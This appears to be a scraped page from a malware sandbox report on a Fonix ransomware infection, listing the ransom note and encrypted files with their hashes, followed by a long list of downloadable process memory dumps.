057730155bfdb9d46bc60f68a22c6a88594fe43a8be455c719f1ccafcf790a89f5bf1ff1e9c22db19c89ef23fd31843f1e5f1d67e7aa54c262f3d65cc8a8c5c9

Download Submit
C:\Users\Public\Desktop\How To Decrypt Files.hta
MD5
f8de7da291b7fac4053eff9ba8b68ef0

SHA1
47f2550dd4ebc56f167e1335ff5ec2f9100f863c

SHA256
95e7ee01826ac22110c8966c634d772037ec25b1fd7c8a01bf1cf48dc154e998

SHA512
0e759a54c9396a94ecacffdcec1b98f4f4264b815d0306f5f20d2e7c7cd7fac52e0f6c78d237da5c15fb1bcc4aa11cf18ff8f9a94c4adaf70811f0d9daf19e53

Download Submit
C:\Users\Public\Desktop\VLC media player.lnk.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5
4a625f667a5a7e7b895e6d3652123242

SHA1
8d96d38b83e249b85f8c9486602085a4c0c82ce4

SHA256
202b8e318f66aadbc53f64e52414d0a8d462ed8473a8636f392360f6f955595c

SHA512
d455149a5d427e9aa84e498e375d2721ecb7d4ab9458cb65605a7cb89322619e7c221865c06c24326978d59fd3298a27db50329b11964c057ca647692476848f

Download Submit
memory/108-216-0x0000000000000000-mapping.dmp

Download
memory/112-2-0x0000000000000000-mapping.dmp

Download
memory/208-329-0x0000000000000000-mapping.dmp

Download
memory/220-330-0x0000000000000000-mapping.dmp

Download
memory/232-331-0x0000000000000000-mapping.dmp

Download
memory/292-170-0x0000000000000000-mapping.dmp

Download
memory/296-215-0x0000000000000000-mapping.dmp

Download
memory/296-178-0x0000000000000000-mapping.dmp

Download
memory/316-156-0x00000000029E0000-0x00000000029F1000-memory.dmp

Filesize
68KB

Download
memory/316-155-0x00000000029E0000-0x00000000029F1000-memory.dmp

Filesize
68KB

Download
memory/316-154-0x0000000001EC0000-0x0000000001ED1000-memory.dmp

Filesize
68KB

Download
memory/316-306-0x0000000000000000-mapping.dmp

Download
memory/388-1-0x0000000000000000-mapping.dmp

Download
memory/432-300-0x0000000000000000-mapping.dmp

Download
memory/432-213-0x0000000000000000-mapping.dmp

Download
memory/548-174-0x0000000000000000-mapping.dmp

Download
memory/568-238-0x0000000000000000-mapping.dmp

Download
memory/568-173-0x0000000000000000-mapping.dmp

Download
memory/576-288-0x0000000000000000-mapping.dmp

Download
memory/576-203-0x0000000000000000-mapping.dmp

Download
memory/592-325-0x0000000000000000-mapping.dmp

Download
memory/612-352-0x0000000000000000-mapping.dmp

Download
memory/612-158-0x0000000000000000-mapping.dmp

Download
memory/620-323-0x0000000000000000-mapping.dmp

Download
memory/656-225-0x0000000000000000-mapping.dmp

Download
memory/656-319-0x0000000000000000-mapping.dmp

Download
memory/656-192-0x0000000000000000-mapping.dmp

Download
memory/680-169-0x0000000000000000-mapping.dmp

Download
memory/732-224-0x0000000000000000-mapping.dmp

Download
memory/736-3-0x0000000000000000-mapping.dmp

Download
memory/736-333-0x0000000000000000-mapping.dmp

Download
memory/740-334-0x0000000000000000-mapping.dmp

Download
memory/740-162-0x0000000000000000-mapping.dmp

Download
memory/788-191-0x0000000000000000-mapping.dmp

Download
memory/788-313-0x0000000000000000-mapping.dmp

Download
memory/788-223-0x0000000000000000-mapping.dmp

Download
memory/808-239-0x0000000000000000-mapping.dmp

Download
memory/808-175-0x0000000000000000-mapping.dmp

Download
memory/812-354-0x0000000000000000-mapping.dmp

Download
memory/820-180-0x0000000000000000-mapping.dmp

Download
memory/820-217-0x0000000000000000-mapping.dmp

Download
memory/844-171-0x0000000000000000-mapping.dmp

Download
memory/852-312-0x0000000000000000-mapping.dmp

Download
memory/868-205-0x0000000000000000-mapping.dmp

Download
memory/868-322-0x0000000000000000-mapping.dmp

Download
memory/904-351-0x0000000000000000-mapping.dmp

Download
memory/916-278-0x0000000000000000-mapping.dmp

Download
memory/924-188-0x0000000000000000-mapping.dmp

Download
memory/1016-0-0x0000000000000000-mapping.dmp

Download
memory/1028-332-0x0000000000000000-mapping.dmp

Download
memory/1032-6-0x0000000000000000-mapping.dmp

Download
memory/1032-275-0x0000000000000000-mapping.dmp

Download
memory/1036-5-0x0000000000000000-mapping.dmp

Download
memory/1060-221-0x0000000000000000-mapping.dmp

Download
memory/1108-294-0x0000000000000000-mapping.dmp

Download
memory/1112-4-0x0000000000000000-mapping.dmp

Download
memory/1112-194-0x0000000000000000-mapping.dmp

Download
memory/1120-289-0x0000000000000000-mapping.dmp

Download
memory/1136-237-0x0000000000000000-mapping.dmp

Download
memory/1136-202-0x0000000000000000-mapping.dmp

Download
memory/1148-206-0x0000000000000000-mapping.dmp

Download
memory/1156-232-0x0000000002B00000-0x0000000002B01000-memory.dmp

Filesize
4KB

Download
memory/1156-227-0x0000000002B00000-0x0000000002B01000-memory.dmp

Filesize
4KB

Download
memory/1156-231-0x0000000002A90000-0x0000000002A91000-memory.dmp

Filesize
4KB

Download
memory/1156-183-0x0000000000000000-mapping.dmp

Download
memory/1156-218-0x0000000000000000-mapping.dmp

Download
memory/1212-214-0x0000000000000000-mapping.dmp

Download
memory/1212-295-0x0000000000000000-mapping.dmp

Download
memory/1212-328-0x0000000000000000-mapping.dmp

Download
memory/1228-308-0x0000000000000000-mapping.dmp

Download
memory/1248-211-0x0000000000000000-mapping.dmp

Download
memory/1256-336-0x0000000000000000-mapping.dmp

Download
memory/1264-321-0x0000000000000000-mapping.dmp

Download
memory/1276-189-0x0000000000000000-mapping.dmp

Download
memory/1296-10-0x0000000000000000-mapping.dmp

Download
memory/1296-163-0x0000000000000000-mapping.dmp

Download
memory/1328-297-0x0000000000000000-mapping.dmp

Download
memory/1332-220-0x0000000000000000-mapping.dmp

Download
memory/1340-201-0x0000000000000000-mapping.dmp

Download
memory/1340-150-0x0000000000000000-mapping.dmp

Download
memory/1340-290-0x0000000000000000-mapping.dmp

Download
memory/1340-236-0x0000000000000000-mapping.dmp

Download
memory/1340-324-0x0000000000000000-mapping.dmp

Download
memory/1352-302-0x0000000000000000-mapping.dmp

Download
memory/1352-179-0x0000000000000000-mapping.dmp

Download
memory/1356-207-0x0000000000000000-mapping.dmp

Download
memory/1376-285-0x0000000000000000-mapping.dmp

Download
memory/1376-17-0x0000000000000000-mapping.dmp

Download
memory/1384-139-0x0000000000000000-mapping.dmp

Download
memory/1384-282-0x0000000000000000-mapping.dmp

Download
memory/1388-187-0x0000000000000000-mapping.dmp

Download
memory/1388-309-0x0000000000000000-mapping.dmp

Download
memory/1388-277-0x0000000000000000-mapping.dmp

Download
memory/1408-210-0x0000000000000000-mapping.dmp

Download
memory/1416-298-0x0000000000000000-mapping.dmp

Download
memory/1428-301-0x0000000000000000-mapping.dmp

Download
memory/1432-299-0x0000000000000000-mapping.dmp

Download
memory/1436-342-0x0000000000000000-mapping.dmp

Download
memory/1444-338-0x0000000000000000-mapping.dmp

Download
memory/1448-307-0x0000000000000000-mapping.dmp

Download
memory/1456-176-0x0000000000000000-mapping.dmp

Download
memory/1468-337-0x0000000000000000-mapping.dmp

Download
memory/1468-296-0x0000000000000000-mapping.dmp

Download
memory/1472-160-0x0000000000000000-mapping.dmp

Download
memory/1472-335-0x0000000000000000-mapping.dmp

Download
memory/1472-159-0x0000000000000000-mapping.dmp

Download
memory/1476-314-0x0000000000000000-mapping.dmp

Download
memory/1476-281-0x0000000000000000-mapping.dmp

Download
memory/1476-350-0x0000000000000000-mapping.dmp

Download
memory/1488-222-0x0000000000000000-mapping.dmp

Download
memory/1492-19-0x0000000002080000-0x0000000002091000-memory.dmp

Filesize
68KB

Download
memory/1492-18-0x0000000001C70000-0x0000000001C81000-memory.dmp

Filesize
68KB

Download
memory/1492-20-0x0000000001C70000-0x0000000001C81000-memory.dmp

Filesize
68KB

Download
memory/1504-172-0x0000000000000000-mapping.dmp

Download
memory/1508-138-0x0000000000000000-mapping.dmp

Download
memory/1508-137-0x0000000000000000-mapping.dmp

Download
memory/1508-196-0x0000000000000000-mapping.dmp

Download
memory/1508-318-0x0000000000000000-mapping.dmp

Download
memory/1508-8-0x0000000000000000-mapping.dmp

Download
memory/1516-7-0x0000000000000000-mapping.dmp

Download
memory/1524-344-0x0000000000000000-mapping.dmp

Download
memory/1524-272-0x0000000000000000-mapping.dmp

Download
memory/1584-208-0x0000000000000000-mapping.dmp

Download
memory/1600-311-0x0000000000000000-mapping.dmp

Download
memory/1600-190-0x0000000000000000-mapping.dmp

Download
memory/1620-161-0x0000000000000000-mapping.dmp

Download
memory/1632-184-0x0000000000000000-mapping.dmp

Download
memory/1636-195-0x0000000000000000-mapping.dmp

Download
memory/1648-182-0x0000000000000000-mapping.dmp

Download
memory/1668-305-0x0000000000000000-mapping.dmp

Download
memory/1672-343-0x0000000000000000-mapping.dmp

Download
memory/1672-273-0x0000000000000000-mapping.dmp

Download
memory/1676-9-0x0000000000000000-mapping.dmp

Download
memory/1680-341-0x0000000000000000-mapping.dmp

Download
memory/1680-340-0x0000000000000000-mapping.dmp

Download
memory/1684-292-0x0000000000000000-mapping.dmp

Download
memory/1692-136-0x0000000000000000-mapping.dmp

Download
memory/1700-276-0x0000000000000000-mapping.dmp

Download
memory/1700-310-0x0000000000000000-mapping.dmp

Download
memory/1732-181-0x0000000000000000-mapping.dmp

Download
memory/1736-303-0x0000000000000000-mapping.dmp

Download
memory/1740-274-0x0000000000000000-mapping.dmp

Download
memory/1744-304-0x0000000000000000-mapping.dmp

Download
memory/1748-219-0x0000000000000000-mapping.dmp

Download
memory/1756-209-0x0000000000000000-mapping.dmp

Download
memory/1756-291-0x0000000000000000-mapping.dmp

Download
memory/1760-193-0x0000000000000000-mapping.dmp

Download
memory/1764-13-0x0000000000000000-mapping.dmp

Download
memory/1768-140-0x0000000000000000-mapping.dmp

Download
memory/1768-12-0x0000000000000000-mapping.dmp

Download
memory/1776-164-0x0000000000000000-mapping.dmp

Download
memory/1776-198-0x0000000000000000-mapping.dmp

Download
memory/1776-284-0x0000000000000000-mapping.dmp

Download
memory/1784-11-0x0000000000000000-mapping.dmp

Download
memory/1788-286-0x0000000000000000-mapping.dmp

Download
memory/1788-228-0x0000000000000000-mapping.dmp

Download
memory/1792-339-0x0000000000000000-mapping.dmp

Download
memory/1792-177-0x0000000000000000-mapping.dmp

Download
memory/1796-186-0x0000000000000000-mapping.dmp

Download
memory/1796-279-0x0000000000000000-mapping.dmp

Download
memory/1808-212-0x0000000000000000-mapping.dmp

Download
memory/1820-204-0x0000000000000000-mapping.dmp

Download
memory/1824-167-0x0000000000000000-mapping.dmp

Download
memory/1828-153-0x0000000000000000-mapping.dmp

Download
memory/1828-168-0x0000000000000000-mapping.dmp

Download
memory/1844-14-0x0000000000000000-mapping.dmp

Download
memory/1844-280-0x0000000000000000-mapping.dmp

Download
memory/1848-15-0x0000000000000000-mapping.dmp

Download
memory/1856-143-0x0000000000000000-mapping.dmp

Download
memory/1864-152-0x0000000000000000-mapping.dmp

Download
memory/1872-317-0x0000000000000000-mapping.dmp

Download
memory/1872-197-0x0000000000000000-mapping.dmp

Download
memory/1884-199-0x0000000000000000-mapping.dmp

Download
memory/1884-16-0x0000000000000000-mapping.dmp

Download
memory/1888-315-0x0000000000000000-mapping.dmp

Download
memory/1892-148-0x0000000000000000-mapping.dmp

Download
memory/1896-145-0x0000000000000000-mapping.dmp

Download
memory/1896-287-0x0000000000000000-mapping.dmp

Download
memory/1896-320-0x0000000000000000-mapping.dmp

Download
memory/1896-200-0x0000000000000000-mapping.dmp

Download
memory/1896-165-0x0000000000000000-mapping.dmp

Download
memory/1908-149-0x0000000000000000-mapping.dmp

Download
memory/1912-316-0x0000000000000000-mapping.dmp

Download
memory/1912-283-0x0000000000000000-mapping.dmp

Download
memory/1920-166-0x0000000000000000-mapping.dmp

Download
memory/1920-151-0x0000000000000000-mapping.dmp

Download
memory/1924-185-0x0000000000000000-mapping.dmp

Download
memory/1936-327-0x0000000000000000-mapping.dmp

Download
memory/1984-326-0x0000000000000000-mapping.dmp

Download
memory/1984-293-0x0000000000000000-mapping.dmp

Download